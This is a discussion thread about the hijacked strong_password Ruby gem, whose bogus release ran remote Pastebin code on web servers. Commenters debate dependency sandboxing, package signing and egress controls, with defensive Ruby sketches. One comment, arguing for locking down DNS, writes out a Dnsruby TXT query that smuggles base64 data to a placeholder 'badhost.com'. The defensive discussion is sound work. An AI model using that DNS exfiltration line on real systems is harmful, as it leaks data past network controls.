As already hypothesized in the comments, I'm pretty sure this was a simple account hijack. The kickball user likely cracked an old password of mine, from before I was using 1password, that was leaked in who knows which of the various breaches that have occurred over the years.
I released that gem years ago and barely remembered even having a rubygems account since I'm not doing much OSS work these days. I simply forgot to rotate out that old password there as a result, which is definitely my bad.
Since being notified and regaining ownership of the gem I've:
1. Removed the kickball gem owner. I don't know why rubygems did not do this automatically but they did not.
2. Reset to a new strong password specific to rubygems.org (haha) with 1password and secured my account with MFA.
3. Released a new version 0.0.8 of the gem so that anyone that unfortunately installed the bogus/yanked 0.0.7 version will hopefully update to the new/real version of the gem.
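For anyone wondering whether one of their apps pulled in the bogus release, the quickest check is what the lockfile resolved to. A minimal sketch using Bundler's lockfile parser (run from the app root; the file path is an assumption):

    require "bundler"

    # Parse the app's lockfile and see which strong_password version is pinned.
    lockfile = Bundler::LockfileParser.new(File.read("Gemfile.lock"))
    spec = lockfile.specs.find { |s| s.name == "strong_password" }

    if spec && spec.version.to_s == "0.0.7"
      warn "strong_password 0.0.7 (the yanked, bogus release) is pinned -- upgrade to 0.0.8"
    end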
Thanks for sharing the info!
The modified gem downloaded and executed code stored in an editable Pastebin, meaning that the code could have changed at any time. Presumably, the malicious code would activate as soon as anyone browsed any page on the affected site. One version of the Pastebin code would execute any code embedded in a magic cookie sent by a client. It would also ping the attacker's server to let them know your webserver was infected.
Nasty, nasty stuff.
To add a bit of a sense of scale here, the popular Devise gem that's used for authentication in many Rails apps has 52.7 million total downloads and almost 20k stars on GitHub. strong_password has 247k total downloads and 191 stars. It has three reverse dependencies, none of which I've ever heard of and none of which have any of their own reverse dependencies.
This suggests to me that this gem is used by less than 1% of Ruby web apps (probably substantially less) and, more importantly, if you have a dependency on this gem you probably know (because it'd be a direct dependency in your Gemfile, not a dependency of a dependency).
This was caught because the author diligently checked their dependencies line by line. How many ruby devs do that?
How many other gems are already hijacked but haven't been discovered because no-one has audited them? That number is almost certainly non-zero.
This is on Rubygems.org. They have enough information to warn devs that the gem might be infected (months since the maintainer last logged in, a gem version released without any corresponding GitHub repo changes, the maintainer's email appearing on Have I Been Pwned with no password change since that date, etc.).
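A rough sketch of the kind of scoring that implies; the field names and thresholds below are made up, since RubyGems doesn't expose anything like this today:

    # Hypothetical heuristic over signals RubyGems already holds internally.
    # All inputs and thresholds here are illustrative, not a real API.
    def release_risk_signals(owner, release, repo)
      signals = []

      dormant_days = (release[:published_at] - owner[:last_login_at]) / 86_400
      signals << "owner dormant #{dormant_days.to_i} days before release" if dormant_days > 90

      if repo && !repo[:tags].include?("v#{release[:version]}")
        signals << "no matching tag in the linked GitHub repo"
      end

      if owner[:breached_at] && owner[:password_changed_at] < owner[:breached_at]
        signals << "owner email in a known breach, password not rotated since"
      end

      signals
    end

    release_risk_signals(
      { last_login_at: Time.utc(2018, 1, 1), breached_at: Time.utc(2018, 6, 1),
        password_changed_at: Time.utc(2017, 1, 1) },
      { published_at: Time.utc(2019, 6, 25), version: "0.0.7" },
      { tags: ["v0.0.6"] }
    )
    # => all three warnings fire for a release shaped like the bogus 0.0.7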
> a [...] ruby gem was hijacked and used to infect production webservers with malware
I wasn't aware of any reports of this being exploited in production. Do you have an example?
I agree with the rest of your comment about the need for more active measures on the part of Rubygems.org and the likelihood that other gems -- especially infrequently used, semi-abandoned ones like this -- have been hijacked without anyone detecting it.
no, I don't have any examples, but then, it's not likely we're going to hear of any - anyone affected is probably unaware (until now, maybe). I guess some might come out of the woodwork now.
But again, Rubygems should have data on who downloaded this version of this gem, and so should be able to warn them, and even publish that data so we know not to visit their sites until they acknowledge and fix.
Does it, though?
If you want this functionality, I recommend not using it as-is, given the security vuln GitHub is currently reporting. Rather, anyone has my permission to copy the code verbatim into your project. It's a pretty simple gem.
Is the algorithm deficient?
To me that looks like code that indeed checks the strength, so I must be missing something.
The writer of that code at least needs to read https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpubli... one more time.
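For what it's worth (and assuming the link is to the digital identity guidelines), the current revision of that guidance, SP 800-63B, boils down to checks more like the sketch below than to heuristic strength scoring. The blocklist file here is a placeholder:

    require "set"

    # NIST 800-63B style check: length bounds plus a blocklist of common or
    # breached passwords; no composition rules, no "strength" estimate.
    COMMON_PASSWORDS = File.readlines("common_passwords.txt", chomp: true).to_set

    def acceptable_password?(password)
      return false if password.length < 8    # minimum length
      return false if password.length > 64   # allow long passphrases, cap sanely
      return false if COMMON_PASSWORDS.include?(password.downcase)
      true
    end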
> The gem seems to have been pulled out from under me… When I login to rubygems.org I don’t seem to have ownership now. Bogus 0.0.7 release was created 6/25/2019.
The way I see it, there are a few options:
1. The rubygem was transferred by RubyGems.org staff to this account.
2. The maintainer's account was hijacked and then it was transferred, and could even still be compromised.
3. There is some issue or attack vector with the rubygem system that allowed the attacker to gain control.
That said, the other two options bear investigation too. Just don't spend time looking for a cold breeze from an un-caulked window frame when the screen door is open.
The lack of funding for foundational parts of many popular ecosystems (e.g. NPM, PyPI, Rubygems) never ceases to surprise me.
If the goal of the project is adoption, then do not ignore that group.
as to losing adoption, that would only happen if
a) there were other options with better security, and given that npm, PyPI and others have had similar problems, there probably aren't
b) developers would actually move ecosystems due to package manager weaknesses. Given that hasn't happened with any of the previous instances of supply chain attacks (and this has been going on for 5+ years now), I don't think so.
As one example, rubygems was compromised in 2013 (https://news.ycombinator.com/item?id=5139583). Did you or anyone else stop using it as a result?
Obv. as a security person I'd say they should prioritise security things like audits and improved authentication requirements for gem owners, but realistically it sounds like just keeping the lights on is pretty expensive.
4. The maintainer of the gem is complicit in the attack, and transferred ownership voluntarily.
That incident highlighted a broadly systemic problem with how these kinds of packages are maintained, it was not a case of "one bad maintainer".
But it is really interesting to see the atmosphere around this systemic problem. Maintainers don't realize that transferring ownership can put users in danger; they'd rather hand the package to a random stranger than mark it abandoned. Then they deny it was ever that serious and ask for more money, and their friends and followers rise up to protect them without ever addressing the central issue. Yeah, that's a systemic problem.
For example, a "strong_password" library should only be given "CPU compute" permissions, no I/O.
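Nothing like this exists in RubyGems today; as a sketch of what the declaration side might look like, using the real gemspec metadata hash but an entirely hypothetical "capabilities" key and enforcement story:

    # Hypothetical: a gem declares its capability surface in its gemspec
    # metadata, and the loader/sandbox would enforce it at require time.
    Gem::Specification.new do |s|
      s.name    = "strong_password"
      s.version = "0.0.8"
      s.summary = "Entropy-based password strength checking"
      s.metadata["capabilities"] = "pure"   # no filesystem, network, or process I/O
    end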
But even with this, the problem will be like what we see on phones: popular libraries will require all the permissions.
You'll want to install React, and React + its 100 dependencies will request everything.
That said, it seems easier said than done to impose those sorts of restrictions on a per-dependency basis. Attempts to statically verify the absence of I/O sound like a great game of whack-a-mole, and I don't know how you'd do it dynamically without running all non-I/O dependencies in an entirely separate process from the main program.
Yeah, logging would be tricky...
Maybe a "logging" capability could be created. Separated from other I/O.
Such a capability would be weird, and nonstandard, and messy, cutting across several abstraction layers. But if pulled off, it might be worth the effort.
Isn't this the sort of thing type inference is made for? Along with return types, functions have an io type if they're marked (std lib) or if they contain a marked function. Otherwise they have the pure type.
This isn’t to say that it’s a bad idea but there are a ton of details which get annoying fast. I know the Rust community was looking into the options after the last NPM hijack was in the news but it sounded like it’d take years to make it meaningfully better.
Maybe that's not such a bad idea. This "strong_password" thing is written in Ruby, a few milliseconds delay is probably not noticeable anyway and vastly preferable given the security implications.
It's a good idea on paper, but has caveats. Every service is responsible for properly authenticating its clients, and needs to be designed so that a compromised client cannot leverage its access to a service to elevate privileges. Sandboxes are difficult to retrofit onto existing programs. The earlier, lowest-common-denominator system frameworks were not originally written with sandboxing in mind. There are numerous performance drawbacks.
For Apple ecosystem developers, XPC services are also how "extensions" for VPN, Safari ad blockers, etc. are written, for a mix of security and stability benefits.
Though funnily enough, as Apple has pursued these technologies, many HN commenters have decried the walls of the garden closing in.
With a rigid import system, each library would be forced to declare what it's going to import (including any system libraries), and then you could e.g. enforce a warning + confirmation any time an updated dependency changes its import list.
It doesn't prevent you from getting owned by a modified privileged library, but it's better than the current case. Unfortunately, it probably requires some language (re-)design to fully implement this approach.
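A sketch of how the warning side might work, assuming each release shipped a declared import list (no such manifest exists today):

    # Compare the declared imports of the old and new release of a dependency
    # and require confirmation when the list grows. Manifests are hypothetical.
    def new_imports(old_manifest, new_manifest)
      new_manifest - old_manifest
    end

    old_list = %w[openssl digest]
    new_list = %w[openssl digest net/http socket]   # an update suddenly wants the network

    added = new_imports(old_list, new_list)
    unless added.empty?
      warn "dependency now imports: #{added.join(', ')} -- confirm before upgrading"
    end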
Which means you would get warnings on pretty much any functional upgrade of most dependencies, which would make the whole system useless from a security point of view.
Why should a functional upgrade of a dependency introduce new dependencies anyway? A library that sets out to do a particular thing shouldn’t grow new features that require new capabilities willy-nilly.
Why not? I've often done upgrades with the sole purpose of replacing questionable, hand-written code with external dependencies I've discovered that do the same thing, but better (more features, more tests, more eyes on the code, more fixed issue reports than my often-closed-source code). From string parsing to networking, this happens a lot. The external contracts of my libraries don't change a bit, so why waste a major version? "I'm using someone else's code instead of what I YOLO'd myself" seems like a poor reason to rev a package version--and even if it's not, where do you draw the line? Cribbing code from StackOverflow?
This _should_ be achievable with Go.
On the other hand, if each dependency in the deps tree had its own required permissions, and you had to grant those permissions to that specific dependency rather than to the rootmost branch of the deps tree that contained it, then things would be a lot nicer. The more fine-grained library authors were in splitting out dependencies, the clearer the permissions situation would be; it'd be clear that e.g. a "left-pad" package way down in the tree wouldn't need any system access.
On the other hand, it'd make sense if dependencies could only add new transitive dependencies during "version update due to automatic version-constraint re-evaluation" if the computed transitive closure of the required permissions didn't increase. Otherwise it'd stop and ask you whether you wanted to authorize the addition of a dep that now asked for these additional permissions.
If you're really worried, then you still could go over your entire tree and override the default settings. But there's nothing that would mean you would be required to do that.
People are thinking about this using the phone/website model, where permissions are only applied at one level. With dependencies, whatever giant framework that you're pulling in could be using the same permissions system to secure its own dependencies, which would make you significantly safer.
Under the current system, you have to hope that none of the authors in your dependency chain make a mistake and get compromised. If everybody can sandbox anything, then you only have to hope that most of those authors don't make a mistake.
If somebody attaches malware to a dependency of a dependency, and if even one person along that chain is following best practices and saying, "yeah, I don't think this needs a special permission", then they've likely just prevented that attack from affecting anyone else deeper down the dependency chain.
Sandboxing in package managers is something that could actually scale pretty well; much better than it does for websites/phones/computers.
High-level (i.e. consuming a lot of dependencies at a lot of levels) tools would simply apply an "allow everything" dependency policy rather than deal with tons of issue reports from people who wanted to import the high-level library in a less-than-root-permissioned project.
Additionally, lots of upgrades do increase the dependency surface. Resolving local usernames is a pretty fundamental thing a lot of dependencies would need. Now consider the libc switch from resolving names via /etc/passwd to resolving from multiple sources (including nslcd, a network/local-network service). If every dependency up the tree adopted a "lowest possible needed IO surface" permission model and then that change happened, there would be hell to pay: maintainers would take the shortest path and open up too many permissions; maintainers wouldn't upgrade and would leave some packages trapped in a no-man's-land; or maintainers would give up on pulling in prone-to-changing-permissions dependencies, leading to even more fragmentation.
Its biggest selling point is that a lot of capability safety could be inferred in packages without the package author separately specifying capabilities.
The basic idea is to disallow the remaining impure escape hatches in Haskell in most code, requiring authors of libraries that do need those escape hatches (e.g. wrappers around C libraries) to assert that their library is trustworthy, and requiring users to accept that trustworthy declaration in a per-user database.
It actually was very promising because the general coding conventions within Haskell libraries made most of them automatically safe, so the set of packages you needed to manually verify wasn't insane (but still unfortunately not a trivial burden, especially if your packages relied on a lot of C FFI).
Unfortunately I have yet to see it used in any commercial projects and it seems in general not to get as much attention as some other GHC extensions.
We need a solution which also works for most used languages, JS/C++/Java/Python..., which suggests that it should be done at a higher level, maybe with OS involvement somehow.
Unfortunately, it seems like it's been removed since Ruby 2.1: https://bugs.ruby-lang.org/issues/8468
Unfortunately, the architecture was too complex for most developers and fell to the wayside. It was finally removed from the 4.0 Framework after being deprecated for some time.
EDIT: never mind, looks like I was mistaken about the network i/o part of this... Might be interesting to have a browser-level "sandboxed service worker" for this purpose though...
Kudos to you!
This is why signing packages will not be a silver bullet that significantly reduces these kinds of attacks. Devs will still have their keys compromised, users will still ignore warnings that keys have changed. It's worth doing, but I am skeptical that it will eliminate these attacks.
My vote is on permissions and sandboxing. I think that sandboxing scales reasonably well since it can be applied to dependencies of dependencies all the way down your entire chain. I think that (unlike with phones) most dependencies don't require stuff like File I/O or Networking, which would eliminate a large number of attacks.
And importantly, I think that sandboxing acknowledges that trust is not binary. The big problem with signing packages is that it's following this outdated model of, "well, you'll either trust a package completely or you won't." The reality is that there are packages and package authors that you trust to different degrees and in different contexts. Many buildings have locks inside of them as well as outside, because trusting someone enough to come into your office is not the same as trusting them to root through all of your filing cabinets.
I don't think efforts around verifying authors/updates are useless, but they do often fail to take this principle into account.
But if you had the key cached, and it changed, you’d probably freak out.
>This is why signing packages will not be a silver bullet that significantly reduces these kinds of attacks.
You’ve just isolated the impact of these attacks to new installs, how is that not significant?
Not in the servers-as-cattle age. By default, a rebuilt server will have a new key. Otherwise, you'd have to save the server SSH key in your configuration/build files, and then you've moved what you have to protect to the source control of the servers, and probably exposed that secret key to many more people and developers than you would have done by leaving the key on the server.
Jumping one stratum forward, with hosted k8s you don't even know the host's key; you do everything via HTTPS and the almost globally accepted list of secure CAs.
If you're using VMs, keys change all the time. Maybe some people here are good about security and would freak out, but I'm thinking about workplaces I've been at, and that's not a typical attitude for developers that I know. If I set up a VM at work and changed the keys on it, I doubt my coworkers would even ask me about it when they saw the warning.
And I'm literally right there -- they're not going to file a Github issue for a developer they've never met asking why the key changed and then stop working until they get a response.
To push the point even more, how many people on here actually wrote down the SSH fingerprint that they got the first time they connected to a remote machine? When you got a new laptop, did you transfer the keys over, or did you just blindly reconnect to every VM again?
Package managers are meant to help you manage installs on multiple machines, so it's not just the first time you use a package -- it's every time you do a fresh clone of the repository, it's every time you throw away your cache and do a new reinstall over the network.
And it's based on this idea that even when doing an update, package managers and developers won't just blindly hit OK if they get a notification that a key changed, which I just don't think is the norm, even in technical circles.
Less than a week ago, a server of mine rebooted due to an unannounced power outage. This particular server just stores some backups and didn’t have proper monitoring, so I didn’t know it had rebooted. Normally, mere unannounced power outages have me shitting bricks, switching hosts or at least extensively verifying the pre-boot environment.
Trying to SSH into the box I received the host key mismatch error because the server boots into dropbear for LUKS. It took me a few minutes to figure out what had happened, but until I did, I definitely fully assumed that my host was up to something really bad.
Every time. Well, "freak out" is a strong phrase. But I do check with a knowledgeable member of the team before continuing.
For instance if I am using Java and I build my web app with only Spring Framework, I can have a lot more confidence that one of my JARs hasn’t been backdoored than I can in an ecosystem where it’s regularly the practice to pull 100s of dependencies from different individual FOSS developers, where it’s difficult to audit the process that each library author is using to secure their package manager upload credentials.
I am not sure signatures are that useful since without a centralized authority to issue the certificates and securely verify author identities, we are just back to a trust-on-first-use policy for the signatures, and people will just end up setting their CI servers to always trust new signatures since they won’t want to deal with what happens when authors change their certificate from version to version (which will surely happen).
As in all forms of engineering there are, of course, no absolutes, only trade-offs to be made.
The more wheels you reinvent, the slower your velocity for solving the core business problems that pay your bills. Moving too slowly can be fatal to the business. It’s a tricky balance. Signing isn’t perfect, but it can improve some aspects of some balances people strike.
Packaging and distribution of libraries takes effort to do properly, so it's only done properly if it's sufficiently centralized. If you have to import fifty third-party wheels, then it's unavoidable that some or most of these wheels can't be managed properly, but it's quite feasible to have a single (or three) well-managed third-party package that provides a hundred wheels so that you don't have to reinvent them. If the strong_password gem were integrated into (for example) Rails and managed/released by the same team with the same processes, then this risk would be avoided. If, instead of a dozen separate gems each providing one piece of functionality, you had a single bundle of varied functionality (like Guava or Apache Commons in Java), then that bundle could handle release management in a way that each separate gem developer cannot.
If you want to have reliable dependencies then you either have to choose only dependencies with bureaucratic and pedantic release governance, or manage/audit each dependency yourself (as the author of the original article seems to have done). In ecosystems where it's reasonable to have serious projects with 0-3 distinct (but large) external dependencies this works easily; in ecosystems where you have dozens or even a hundred dependencies, that overhead is impractical for most projects.
That's a false dichotomy. There are middle grounds which can and do work at scale:
Upgrade knowingly and deliberately (don't just spray greenkeeper everywhere).
Carefully monitor changed application/network behavior after upgrades.
Devote a manageable, non-zero amount of time to reading/finding security bulletins or security incidents on your most-heavily-used dependencies.
Pay attention to issue reports and prioritize any with possible security implications.
...and (at a slightly larger scale) hire, empower, and compensate people to do those kinds of things in a systematic, regular way.
Seriously, security engineering isn't served well by "ZOMG NPM is garbage we must switch to $megaframework and pray that their release engineers get everything right" hysteria and absolutism. There are effective, moderate strategies that help with these issues every day.
1) only upgrade dependencies “knowingly and deliberately” (as the author of this article did). What does this mean if not auditing the upgrades? Just upgrading more rarely (e.g. because you know you need a specific feature or bug fix), but still auditing them? By waiting to upgrade, the diff will be vastly larger and performing an audit to “knowingly” upgrade will be much more difficult.
2) detecting a breach after you’ve already installed an attacker’s code onto your servers, via active monitoring or by hoping someone else does active monitoring or auditing and reports the issue to you or to a central authority.
#1 as a “middle ground” doesn’t seem too different from the post you responded to. #2 is what most projects seem to rely on - hope someone else finds the problem and reports it, and that they don’t get hit too hard in the meantime.
Whereas in some other ecosystems, you have to go get each wheel individually from a different person. There are certainly reasons why each ecosystem evolved the way it did, but I don’t think it’s impossible that this sort of stuff could centralize more in the future, especially as it becomes more clear what should be “batteries included” or what things are actually needed and used by the community.
Sure, but even here we see you modulating your position from “only Spring” to “Spring, Guava, and Apache Commons”, tripling the number of dependencies you’re willing to admit.
Really what it boils down to is, you’re saying what I’m saying. Declaring absolutely “this dependency, and no others” is silly — rather, it’s a question of trade-offs, and you feel that in your use cases trading off, say, 3 or 4 large dependencies is worth the velocity gain. Nobody is arguing with that.
Fewer, larger, carefully considered dependencies is a rational set of trade-offs to make.
The maintenance and trust verification overhead for a micro "5 lines of code" dependency is usually way higher than just rewriting those 5 lines yourself.
As an aside: just because someone made their code available doesn't mean it's good or that it solves all your edge cases. Getting those fixed also takes up time.
Sure. I was in no way advocating “JS-style, 5 line microlibs Uber Alles”, merely pointing out that there’s a clear trade-off between dependencies and velocity that there’s no silver bullet for.
There’s absolutely nothing wrong with OP saying “we can afford to make Spring our only dependency”, but there’s also nothing wrong with saying “we need actor-based concurrency and the business will be dead before we roll our own, let’s bring in Akka”, “we need to deal with time and spending 40 hours a month keeping up with every legislature on the planet’s timezone-related lawmaking doesn’t pay the bills, bring in JodaTime”, etc.
It’s engineering; these trade-offs should of course be carefully considered (is_even should fail most any sane consideration), but it’s a bit silly to suggest they can just be avoided entirely by businesses that have to make money to pay the bills.
Again, signing helps when you need to make those trade-offs. There are no absolutes here.
JodaTime is now deprecated in favor of Java 8 time (JSR-310). Akka is an official library from Typesafe/Lightbend. In a JVM ecosystem, you can get this kind of stuff directly from a supported corporate vendor. You can even easily pay them for support if you want. And a lot of times stuff even gets standardized through the JSR process.
Now, if you’re in a pre-Java 8 world and you need JodaTime, sure it makes sense to bring it in, not just use only Spring. But eventually that software library gets recognized as necessary to the ecosystem and standardized, and you no longer have to rely on yet another 3rd party for it.
Whereas in another ecosystem, JodaTime might just keep existing, maybe even alongside the bad default language library, and everyone has to always be told to go get this third party dependency if you want to do things right.
Yeah. I didn’t claim otherwise? Like I said, there are only trade-offs here. You can gain a ton of velocity if you abstract it all out to a file of 50,000 “magic words”; but obviously then your exposure to these issues is enormous.
Trade-offs are like that.
> I don't miss the "old" days of searching for libs, extracting a zip, and trying to figure out the integration steps, but there is something to be said for there being a bit more of a sense of ownership.
Eh, to the extent that I get any such feeling, I think it’s mostly a completely false sense of security. I did some stuff in a C++ codebase that was fully developed that way, and did the ol’ “hunt, unzip, and compile” for some boost libs. I didn’t audit the source. It being boost C++ god knows if I’d even have been able to recognize a heavily template-metaprogrammed exploit.
If boost’s account had been compromised I’d have been every bit as fucked as people who use this gem were. Supply chain attacks are dangerous regardless. All you can do is try to balance your exposure vs your time spent on solving problems that don’t pay the bills vs those that do.
I wasn't thinking so much about avoiding vulns due to added scrutiny as about issues with updated libs, since most build processes pull gems, etc. when deploying or rebuilding a container; I don't think many vendor the gems. Typically you'd ship the actual files you unzipped, as opposed to letting the package manager grab the most recent version within the version spec.
Automating a “bundle update” to pull latest versions within spec and update the lockfile would be odd in my experience. You’d typically do that manually, (hopefully, if you’re competent) look at what changed, and retest (semver is great as long as everyone perfectly anticipates & categorizes every change’s impact. In the real world, however, ....) rather than blindly just letting a deployment run whatever.
Bad devs can do the stupidest thing imaginable in any system, though, so I don’t doubt this is out there.
And the more mistakes you make, the more you piss off your users (or worse, compromise their data because you thought you could roll your own version of some security-critical dependency you ditched).
Yes, the situation sucks. I just looked at the frontend of a relatively small app we use for administration, and it depends on almost 5,000 node module versions. But this problem needs to be dealt with as soon as possible, and I don’t think that a fundamental change in development culture—making everything harder for developers in the process—is going to help.
With a dependency forest that large, it's a wonder that more JS projects aren't compromised by bad dependencies...
Sure, as with 2FA, signatures help with the problem that some people use weak passwords or share their passwords. But IMO it would be better to restrict upload rights to the top 100 maintainers and give them HSMs they use to authenticate those uploads. Anyone wanting to upload would have to ask one of the maintainers to sponsor them. This would reduce the number of people you have to trust when building anything from the package repository.
It's staggering the lack of consideration given to basic security by what should be competent software engineers.
You can implement this however makes sense for you. For me, the easiest thing is to run a simple locked-down proxy server, and allow only specific domains there. This makes it easy to set up whatever rules you want, allowing entire domains or only specific hosts. And it gives you a convenient place to log entries before you lock them down.
This is also why you shouldn't allow external DNS resolution from every host in your network. It would be just as easy to move data in and out with Dnsruby::Resolver.new.query('base64-encoded-payload.badhost.com', 'TXT'), 255 bytes at a time.
Once everything is moving through your proxy, there's no need to allow external DNS resolution from other hosts.
Also, most of this traffic is still unencrypted, and dig'ing strange servers is noisy as hell. I'm pretty sure (famous last words) that most entry-level firewalls would flag this out of the box. If they don't, they should.
Still upvoted you though. This is an exfiltration technique that is really easy to spot and not widely known about.
Mad props to the author, Tute Costa, for doing this. It's a large investment of time for usually no return, so I think very few people do. And his (?) reaction to finding this was quite effective.
Thank you for your service sir.
Does the upcoming built-in package manager on GitHub solve this problem? Does it guarantee that packages are only built from code pushed to GitHub, and that the commit hash is associated with the package metadata in some way?
If "this could go way deeper" is your answer to a super unpopular rubygem getting hijacked, why isn't that just the default assumption then?
Do you only use thoroughly audited software projects? How do you manage that?
This also heavily encourages microservices, since most non-trivial applications will have some reason to connect to fairly arbitrary resources. Hopefully that can be sandboxed well, but relatively few apps were designed that way, and that general class of things which weren’t supposed to work (but do) is notoriously easy for even experienced teams to miss.